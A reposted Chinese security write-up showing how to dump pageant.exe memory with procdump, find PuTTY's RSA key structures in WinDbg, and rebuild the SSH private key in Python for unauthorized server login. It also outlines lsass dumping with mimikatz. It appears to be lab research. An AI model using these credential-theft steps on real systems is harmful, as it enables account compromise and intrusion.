转载

Memory Dump利用实例

0x00 前言

众所周知,procdump可以获得进程的内存dump文件 最常见的用法如下:

1、使用procdump抓取lsass进程 2、获得LSASS进程内存dump文件 3、用mimikatz解析dump文件 4、获取主机明文密码

那么,我们是否可以大胆设想一下,能否使用procdump抓取其他进程内存文件,进而获得内存中的敏感信息呢?

0x01 目标

尝试使用procdump获取putty ssh登录的密钥,实现非授权登录目标Linux服务器

0x02 测试环境

目标:

操作系统:Win7 x86 进程:     putty.exe: SSH 客户端     pageant.exe:PuTTY的SSH认证代理,用这个可以不用每次登录输入口令

使用工具:

procdump windbg 6.3.9600

0x03 环境搭建

1、工具下载地址:

Putty工具集: http://the.earth.li/~sgtatham/putty/latest/x86/putty.zip  windbg 6.3.9600下载地址: http://download.csdn.net/detail/ytfrdfiw/8182431

2、主机环境配置

(1)生成密匙

在目标主机运行puttygen.exe,选择需要的密匙类型和长度,使用默认的SSH2(RSA),长度设置为1024 点击Save private key 保存公私钥

如图

Memory Dump利用实例

(2)上传公钥

登录Linux服务器,然后执行如下命令:

$ cd ~ $ mkdir .ssh $ chmod 700 .ssh $ cd .ssh $ cat > authorized_keys 粘贴公钥 $ chmod 600 authorized_keys

如图

Memory Dump利用实例

(3)导入私钥实现自动登录

运行pageant导入私钥,运行putty.exe自动登录

如图

Memory Dump利用实例

Memory Dump利用实例

Tips:

出现 PuTTY:server refused our key 无法自动登录的解决方法:

禁用系统的 selinux 功能,命令 #setenforce 0

0x04 实际测试

1、获取进程pageant的内存文件

执行:

Procdump.exe -accepteula -ma pageant.exe lsass5putty.dmp

如图

Memory Dump利用实例

2、使用WinDBG定位内存文件

使用 Windbg 加载 lsass5putty.dmp 文件, alt+5 查看内存信息

Tips:

WinDbg需要作如下设置: 运行WinDbg->菜单->File->Symbol File Path 在 弹出的框中输入“C:/MyCodesSymbols; SRV*C:/MyLocalSymbols*http://msdl.microsoft.com/download/symbols”(按照这样设置,WinDbg将先从本地文件夹C:/MyCodesSymbols中查找Symbol,如果找不到,则自动从MS的Symbol Server上下载Symbols,文件夹C:/MyCodesSymbols需要提前建立) 否则会出现ERROR: Symbol file could not be found

(1)查看starting offset

定位 00420d2c

如图

Memory Dump利用实例

说明:

00420d2c 为变量 ssh2keys 固定的起始地址

后面提到的结构体参照源码中的 tree234.csshpubk.c 文件,

研究具体结构执行过程参照c源码就好

源码下载地址:

http://tartarus.org/~simon/putty-snapshots/putty-src.zip

(2)查看tree234_Tag

定位 01361f10

如图

Memory Dump利用实例 

struct tree234_Tag{     node234 *root=013607c0;     cmpfn234 cmp=0040f0a5; };

(3)查看node234_Tag

定位 013607c0

如图

Memory Dump利用实例 

struct node234_Tag{  node234 *parent=00000000;  node234 *kids[4]={00000000,00000000,00000000,00000000};  int counts[4]={00000000,00000000,00000000,00000000};  void *elems[3]={01364fc8,00000000,00000000}; };

(4)查看elems[0]

定位 01364fc8

如图

Memory Dump利用实例 

struct ssh2_userkey{     const struct ssh_signkey *alg=0041c83c;     void *data=01360b30;     char *comment=01360858; };

(5)确认是否找到ssh2_userkey,查看*comment

定位 01360858

如图

Memory Dump利用实例

发现字符 rsa-key-20150908

(6)查看RSAKey,即*data

定位 01360b30

如图

Memory Dump利用实例 

struct RSAKey{  int bits=01363f38;  int bytes=013600c4;  Bignum modulus=01360b70;  Bignum exponent=01360b60;  Bignum private_expinent=01363f38;  Bignum p=01363fc8;  Bignum q=01364018;  Bignum iqmp=01364068;  char *comment=00000000; };

(7)获取RSA key

RSA key格式:

Construct an RSA key object from a tuple of valid RSA components. See RSAImplementation.construct.  Parameters:  tup (tuple) - A tuple of long integers, with at least 2 and no more than 6 items. The items come in the following order:   RSA modulus (n).  Public exponent (e).  Private exponent (d). Only required if the key is private.  First factor of n (p). Optional.  Second factor of n (q). Optional.  CRT coefficient, (1/p) mod q (u). Optional. Returns:  An RSA key object (_RSAobj).

RSA modulus:

定位 01360b70

如图

Memory Dump利用实例

第一位 00000020 表示读取长度,转为10进制为32,读取长度为32

RSA modulus

004b8e2f be2db5f7 575b3f42 3b9b6774 f0924e40 1418b4a9 7af433cf 4df68526 e2866be4 6ba6a84d b49941c8 ea8462d9 b5ca8e6d 555a0f1b 3b084437 066a5319 65a69b95 c596daa8 ab89949e 1823d812 cdff4adb 6efe09cc 003d765c 925d10c5 2aabc14e 71f7621d fa84e9ed 8d8da1b0 9a156896 c41a0d2f b95f8c7d 5aa2ae5a

Public exponent:

定位 01360b60

如图

Memory Dump利用实例

第一位00000001表示读取长度,转为10进制为1,读取长度为1

Public exponent为0x25

Private exponent:

定位 01363f38

如图

Memory Dump利用实例

第一位00000020表示读取长度,转为10进制为32,读取长度为32

Private exponent为

6c5c9ead 1f5b1e50 47b1b98e 231ed4b9 a2319931 24f1ebda 9650c9fd 44735efe 7dce99ee de1bb6d9 b6e28e4b ad7f096a 0fa86baf 1f9ffb4d de181a88 fedb8599 47efbf03 d4e866c6 04a2da80 6f5aea2a 51acf42f 02fff26d e454b02c 8e558ad4 2aaab232 4159b68b e42d1b14 1f805e50 1fd710aa 88c26f0f 12d911a2 02731978

(8)生成RSA key

import sys import base64 from Crypto.PublicKey import RSA def string_to_long(data):  data = data.split(' ')  data.reverse()  return long(("".join(data)),16) if __name__ == "__main__":  #setup the primitives  rsamod = string_to_long('004b8e2f be2db5f7 575b3f42 3b9b6774 f0924e40 1418b4a9 7af433cf 4df68526 e2866be4  6ba6a84d b49941c8 ea8462d9 b5ca8e6d 555a0f1b 3b084437 066a5319 65a69b95 c596daa8 ab89949e 1823d812 cdff4adb 6efe09cc 003d765c 925d10c5 2aabc14e 71f7621d fa84e9ed 8d8da1b0 9a156896 c41a0d2f b95f8c7d 5aa2ae5a')  rsapubexp = long(0x25)  rsaprivexp = string_to_long('6c5c9ead 1f5b1e50 47b1b98e 231ed4b9 a2319931 24f1ebda 9650c9fd 44735efe 7dce99ee de1bb6d9 b6e28e4b ad7f096a 0fa86baf 1f9ffb4d de181a88 fedb8599 47efbf03 d4e866c6 04a2da80 6f5aea2a 51acf42f 02fff26d e454b02c 8e558ad4 2aaab232 4159b68b e42d1b14 1f805e50 1fd710aa 88c26f0f 12d911a2 02731978')  rawkey = (rsamod,rsapubexp,rsaprivexp)  #construct the desired RSA key  rsakey = RSA.construct(rawkey)  #print the object, publickey, privatekey  print rsakey   print rsakey.publickey().exportKey('PEM')  print rsakey.exportKey('PEM')  print 'OpenSSH format Public:'  print rsakey.publickey().exportKey('OpenSSH')

保存为a.py后执行得到公私钥

如图

Memory Dump利用实例

同puttygen.exe生成的公钥做对比

如图

Memory Dump利用实例

Tips:

此段python脚本使用print rsakey.publickey().exportKey('OpenSSH')输出验证公钥的正确 私钥无法使用print rsakey.exportKey('OpenSSH')输出

原因如下:

如图

Memory Dump利用实例

3、利用获取的私钥远程登录

0x05 补充

https://blog.netspi.com/stealing-unencrypted-ssh-agent-keys-from-memory/ http://www.oschina.net/translate/stealing-unencrypted-ssh-agent-keys-from-memory http://drops.wooyun.org/tips/2719

如上链接,之前有人介绍过“从内存中窃取未加密的SSH-agent密钥”,但该方法是针对linxu环境的内存dump,通过python脚本直接解析 而本文实例是对windows下使用procdump抓取进程内存文件,进而获得内存中的敏感信息的一种尝试探索,全部操作过程完全可以使用一个py文件实现。 参考链接:

http://www.poluoluo.com/server/201107/138424.html http://blog.sina.com.cn/s/blog_5f5e2ce50101788l.html https://www.dlitz.net/software/pycrypto/api/current/ https://diablohorn.wordpress.com/2015/09/04/discovering-the-secrets-of-a-pageant-minidump/

0x06 小结

本文仅测试了putty&pageant的内存密钥获取,证明了思路的正确 更多测试持续进行中

本文由三好学生原创并首发于乌云知识库,转载请注明

正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
Java入门教程 bootstrap3 CSS springboot-demo Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 Struts2教程 MongoDB教程 Redis教程 Spring教程 Git教程 Jenkins进阶系列 openfire参考指南 Java设计模式 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 SpringCloud ANTLR教程 Hive教程 java实例教程 Ant教程 Hazelcast教程 Elastic-Job-Lite XStream教程 深入浅出MyBatis SVN教程 ibaties教程 rabittmq教程 WebService CXF学习 Hadoop教程 solr教程 JPA教程 ActiveMQ中文指南 Java内存模型 dubbo教程 Linux入门视频教程
近期评论
  1. 1 Spring Boot集成Spring Session快速入门Demo
  2. 2 Spring Boot集成RabbitMQ快速入门Demo
  3. 3 Spring Boot集成Quartz快速入门Demo
  4. 4 Spring Boot集成Mybatis Plus快速入门Demo
  5. 5 Spring Boot集成zipkin快速入门Demo
  6. 6 能用365块大洋去解决的事,千万不要用时间
  7. 7 Spring Boot集成atomikos快速入门Demo
  8. 8 Spring Boot集成fastdfs快速入门Demo
  9. 9 Spring Boot集成Https快速入门Demo
  10. 10 Spring Boot集成easypoi快速入门Demo
网站信息
  • 文章总数:155,463 篇
  • 文件总数:468,744 个
  • 标签总数:2,266 个
  • 分类总数:90 个
  • 留言数量:2,542 条
  • 在线人数:646 人
  • 运行天数:4,196天
  • 最后更新:2024年04月23日22点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG